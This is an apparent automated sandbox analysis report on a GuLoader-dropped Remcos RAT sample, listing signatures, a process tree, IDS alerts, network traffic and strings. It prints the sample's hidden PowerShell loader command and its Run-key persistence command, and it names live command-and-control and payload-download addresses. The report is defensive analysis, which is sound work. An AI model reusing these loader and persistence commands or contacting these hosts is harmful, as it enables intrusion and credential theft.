Windows Analysis Report
SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe
Analysis ID: 1522631
MD5: 450228d72f9f726b645c55bbbc6db905
SHA1: b26075c51a4681f2ff7407188f5e9480545a7aca
SHA256: 9124d7696d2b94e7959933c3f7a8f68e61a5ce29cd5934a4d0379c2193b126be
Tags: exe
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe (PID: 2688 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
    • powershell.exe (PID: 6284 cmdline: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Vaccinerende.exe (PID: 5916 cmdline: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • cmd.exe (PID: 2180 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 5624 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • Vaccinerende.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\lkcwddclh" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\omhpewnevqbu" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 5996 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\yguhfoygjytgatk" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 2140 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\dpvrcfd" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 1344 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\fsbcdyonhlh" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • Vaccinerende.exe (PID: 5940 cmdline: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe /stext "C:\Users\user\AppData\Local\Temp\qmgvdqygubzojv" MD5: 450228D72F9F726B645C55BBBC6DB905)
        • WerFault.exe (PID: 7068 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 892 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.3360987921.000000000C608000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: Vaccinerende.exe PID: 6044 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |
Process Memory Space: Vaccinerende.exe PID: 2140 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security |

        System Summary

        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5624, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chivey57
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2180, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 5624, ProcessName: reg.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Vaccinerende.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ParentProcessId: 5916, ParentProcessName: Vaccinerende.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Chivey57" /t REG_EXPAND_SZ /d "%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path 'HKCU:\Software\Roscoelite\').Aftvttedes;%Misbehavers% ($Frligheden)", ProcessId: 2180, ProcessName: cmd.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)", CommandLine: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, ParentProcessId: 2688, ParentProcessName: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)", ProcessId: 6284, ProcessName: powershell.exe

        Stealing of Sensitive Information

        Source: Registry Key setAuthor: Joe Security: Data: Details: 00 21 BC BC 23 53 AA E8 94 9B E0 2A 08 D0 4B 56 C2 2F 8B 12 99 DA 07 CC 62 71 73 68 10 B5 BD 45 F4 15 E9 3D C8 20 16 66 6D 76 69 D1 DF 18 78 66 41 03 C0 AD 59 C2 23 8D A4 8B 34 7D 13 60 30 49 C4 1E C3 B2 19 6C E9 38 BA 4F 64 98 B2 7C A7 6C 16 CE E8 31 FA 4D 83 7C 50 F5 F3 3C E6 78 FA 25 98 10 1F 93 04 C3 , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ProcessId: 5916, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-DSGECX\exepath
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-09-30T13:59:47.052624+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 107.173.4.16 | 2404 | TCP
        2024-09-30T13:59:48.146382+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 107.173.4.16 | 2404 | TCP
        2024-09-30T13:59:55.947608+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 107.173.4.16 | 2404 | TCP
        2024-09-30T13:59:55.958911+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 107.173.4.16 | 2404 | TCP
        2024-09-30T13:59:48.254608+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | TCP
        2024-09-30T13:59:43.556757+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 192.3.220.22 | 80 | TCP

        AV Detection

        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, ReversingLabs: Detection: 23%
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, Virustotal: Detection: 32%
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, ReversingLabs: Detection: 23%
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Virustotal: Detection: 32%
        Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, Code function: 12_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,12_2_00404423
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.3356692851.00000000071CC000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Code function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Code function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Code function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, Code function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
        Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exe, Code function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
        Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\intercessionate\
        Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\
        Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\
        Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
        Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\
        Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\

        Networking

        Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 107.173.4.16:2404
        Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49738 -> 107.173.4.16:2404
        Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 107.173.4.16:2404
        Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 107.173.4.16:2404
        Source: global traffic, TCP traffic: 192.168.2.4:49738 -> 107.173.4.16:2404
        Source: global traffic, HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
        Source: Joe Sandbox View, IP Address: 107.173.4.16
        Source: Joe Sandbox View, IP Address: 178.237.33.50
        Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS
        Source: Network traffic, Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
        Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 192.3.220.22:80
        Source: global traffic, HTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 192.3.220.22 Cache-Control: no-cache
        Source: unknown, TCP traffic detected without corresponding DNS query: 192.3.220.22
        Source: Vaccinerende.exe, 0000000C.00000002.3452842221.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455492305.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 92.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000002.3452842221.000000000090A000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455492305.000000000058A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 92.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
        Source: Vaccinerende.exe, 0000000F.00000003.3454739598.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Xs://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000F.00000003.3454739598.0000000000589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Xs://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
        Source: Vaccinerende.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000003.3451895239.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000003.3451895239.0000000000909000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imghttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
        Source: Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
        Source: Vaccinerende.exe, 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455198699.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: powershell.exe, 00000001.00000002.3356692851.00000000070F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microv
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: SecuriteInfo.com.Win32.InjectorX-gen.20521.11680.exe, Vaccinerende.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: bhv64C2.tmp.15.dr, bhv4DB0.tmp.12.drString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004D56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
        Source: Vaccinerende.exe, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
        Source: Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
        Source: Vaccinerende.exe, 0000000E.00000002.3385658786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
        Source: Vaccinerende.exe, 0000000E.00000003.3385540576.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000000E.00000003.3385506073.000000000090D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441736796.000000000085D000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 00000011.00000003.3441653927.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
        Source: Vaccinerende.exe, 0000000C.00000002.3452099988.0000000000193000.00000004.00000010.00020000.00000000.sdmp, Vaccinerende.exe, 0000000F.00000002.3455058048.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
        Source: Vaccinerende.exe, 00000011.00000002.3441886712.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
        Source: powershell.exe, 00000001.00000002.3348576807.0000000004C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
        Source: powershell.exe, 00000001.00000002.3355195208.0000000005C69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
